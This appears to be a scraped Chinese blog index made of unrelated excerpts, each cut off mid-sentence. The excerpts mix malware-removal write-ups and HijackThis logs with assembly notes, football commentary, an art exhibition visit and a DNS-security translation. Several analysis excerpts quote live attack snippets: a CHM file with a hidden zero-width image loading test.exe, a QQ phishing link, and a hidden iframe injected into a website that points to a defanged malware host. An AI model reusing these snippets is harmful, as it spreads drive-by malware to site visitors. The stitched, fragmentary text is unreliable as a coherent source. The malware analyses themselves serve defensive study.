其他

來源：賽迪網  

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<;FileName: FileTime.asm;Function: Show the last write time of file "C:/IO.SYS";  Auth

 (續1) 　　從pe_xscan 的 log 上看，病毒程式下載安裝了許多惡意程式，並且其中一些放在IE及Tencent程式檔案夾中，魚目混珠。如： 檔案說明符 : C:/Program Files/Internet Explorer/Top.dll屬性 : A---數位簽章:否PE檔案:是擷取檔案版本資訊大小失敗!建立時間 : 2009-9-22 16:26:20修改時間 : 2009-9-22 16:26:22大小 : 66141 位元組 64.605 KBMD5 : bf779e4ff8

去廣西壯族自治區博物館看了“感悟大明山”陳慶珠大型油畫展、湘繡　　恰好遇上“感悟大明山”陳慶珠大型油畫展在廣西壯族自治區博物館舉行，免費領票欣賞。這段時間正在看英國著名美術史家貢布裡希(Ernst H.Gombrich)著、範景中譯的《藝術發展史——“藝術的故事”（The Story of

　　【eNet矽谷動力訊息】美國東部時間6月26日(北京時間6月27日)訊息，有許多的反間諜功能軟體會清除使用者上網以後留在電腦硬碟中的資料追蹤檔案，即cookies。 　　而微軟的反間諜功能軟體沒有這種功能，在業內，人們對是否清除廣告軟體就可以清除間諜軟體存在分歧。業界對什麼是間諜軟體，什麼是廣告軟體，廣告軟體是否是間諜軟體的一種形式或是載體等看法不一。　 　　使用者對此也是困惑不解，清除電腦cookies是否過頭了，還是做得不夠？反間諜功能軟體在清除垃圾的同時是否也清除了一些有用的程式？　

endurer　原創2006-06-20　第3版 補充：瑞星18.32.10將test.exe報為Trojan.DL.Inject.fg2006-06-19　第2版 補充：江民KV將test.exe報為TrojanDownloader.Small.mp2006-06-18　第1版一位網發來的cHM檔案中有代碼：  ＜body onselectstart="return false"; onpaste="return false";＞＜img src="test.exe" width=0

0:3完敗荷蘭 羅馬尼亞藏刃以待

Purple Endurer　原創2006-10-14　　第1版 1、給記憶體變數賦32位立即數值實驗1）使用push-pop指令0040100A  |. 68 31323334    PUSH 343332310040100F  |. 8F05 50304000  POP DWORD PTR DS:[403050]00401015  |指令長度：015h-0Ah=0Bh=11d2）使用 mov 指令0040101A  |. C705 50304000 >MOV DWORD PTR DS:

意大利1:1羅馬尼亞　能抓住運氣的人卻被留在了意大利……　　這次多意大利隊主教練多納多尼調整了陣容，後防線穩固了很多，中前場組織穿插也比對荷蘭時好，但配合還生蔬一些，記得下半場有一次，在荷蘭前場，三個隊員同時跑向同一個位置來作接應，就是沒有默契的表現。　　不過皮爾洛，還有皮耶羅的自由球都打飛機去了，沒有像上一場一樣製造威脅！　　另外就是運氣欠佳……　　運氣欠佳，除了裁判的判罰，餘下的就是有破門機會但沒抓住，意大利隊連續兩場比賽都是運氣欠佳，沒抓住破門機會，只能說明球員有問題了……　　球從邊路傳中

endurer　原創2006-10-01　第1版 QQ自動發送的資訊為：/-------看看我最近的照片~~~ 才掃描到Q-Zone空間上的。是不是有點太露了? hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***384/-------/點擊該連結開啟的網頁首部有用自訂函數 psw（）加密的JavaScript指令碼代碼。解密後為/-------＜iframe src＝hxxp://web**4.3***

endurer　原創2006-10-23 第1版有一位朋友電腦中QQ的鍵盤加密技術不能啟動，讓偶協助看看。到 http://endurer.ys168.com 下載 HijackThis 和 ProcView。用HijackThis 掃描 log，發現幾個可疑項：/------------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2

某廣電行業網站被掛馬 Backdoor.Win32.Gpigeon.aic/ sx.exeendurer 原創2007-09-06 第1版網站頁面被植入代碼：/---＜iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0＞ ---/hxxp://www.h**l*bz.com/x*j***/Dns.htm　包含 JavaScript指令碼，首先輸出escape編碼的資訊：/---www.CuteQq.cnZJWm 6

背水一戰　意大利2:0法國　時來運轉還是破咒還債？　　由於前兩場比賽運氣不佳，本場比賽意大利隊不僅要全力以赴拿下，還要看荷蘭與羅馬尼亞的比賽結果。　　這次意大利倒是得了天利、人和。先是裡貝裡開場十分鐘就左膝扭傷下場；然後是多梅內克安排的炸彈——客串中衛的阿比達爾絆倒托尼，不僅領了紅牌，還送了一個十二碼；接下來就是德羅西自由球時享利自擺烏龍。　　由於荷蘭2:0羅馬尼亞，意大利幸運晉級。　　荷蘭3:0了結了8年前與意大利的的那筆舊帳，並打破30年不勝魔咒；這場比賽，意大利也顛覆了30年未在120分鐘

　　某報社的專欄女作家吳秋月在古董店中發現自己當年送給“初戀”的定情物——Nat King

在寫一些系統安全和維護方面的blog文章時，有時要提供一些惡意程式檔案的屬性、語言、版本、時間、MD5值等資訊，現在這些工作可以用FileInfo來完成了。這個程式支援多個檔案的拖動……：http://purpleendurer.ys168.com例如擷取FileInfo.exe本身的資訊內容如下： 檔案說明符 : D:/pe_works/fileinfo.exe屬性 : A---語言 : 中文(中國)檔案版本 : 0.0.0003說明 : 擷取檔案資訊著作權 :

Ten things you should know about securing DNS您需要知道的10件與DNS安全有關的事情by  Dr. Thomas Shinder MCSE 作者：Thomas Shinder博士　微軟認證系統工程師翻譯：endurer 2005.09.14第一稿Keywords:  Security | TCP/IP | Network security 關鍵字：安全 | TCP/IP | 網路安全 Takeaway: DNS software is a

endurer 原創2006-12-20 第1版 有一位網友發email來說，他遇到了與遭遇Trojan-PSW.Win32.WOW.ms、Trojan.PSW.Lmir.lnv等木馬 相似的問題，並附帶了 HijackThis 掃描的簡明log，可惜沒有ProcView的進程列表。在log中發現如下可疑項目：/------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (WinNT

時間無情流逝，同學有情長存 同學之情是很純真的，出到社會上後體會特別深…… 同學之間沒有什麼功利性，不會拿工作成績、收入、成就之類的眼光來看人 大家一起回憶那些共同渡過的美好時光，再次叫起每個人的外號，重新演述其間發生的趣事……互相開玩笑，沒有什麼顧慮……好像又回到了以前那段無憂無慮地念書的日子，真似往日重現～ 大家畢業後經曆的喜怒哀樂都可以分享出來，那些跟朋友都不便說的話，在同學面前都可以一吐為快，不用擔心勾心鬥角，兩面三刀……也可以促膝長談日後的打算，真是全身心的放鬆……

endurer 原創2007-02-26 第1版一位同事說他的電腦工作異常，讓偶幫忙檢查看看。到 http://endurer.ys168.com 下載了 HijackThis 掃描log，發現可疑項：/-----Logfile of HijackThis v1.99.1Scan saved at 9:04:52, on 2007-2-26Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.

　　那天晚上偶發了《瑞星2010公測的目的徹底把偶雷倒了》一文，第二天就有瑞星的人員跟偶聯絡商量，讓偶把那篇博文撤下來。 　　因為該人員不希望他的話出現在媒體網路上，所以這裡只貼出偶當時的回複： 其實我寫這個並不是因為這個獎而是瑞星對測試的目的定位讓人太失望了以前我一直認為瑞星是國產殺軟中最有希望的，不過現在不再這樣想的如果瑞星公測的目的跟偶在博文裡寫的不一樣，那是最好不過的了人正不怕影子歪，時間會為瑞星證明一切的 　　被偶拒絕後，該人員表示，此次聯絡商量系其個人行為，跟瑞星公司無關。  　　隨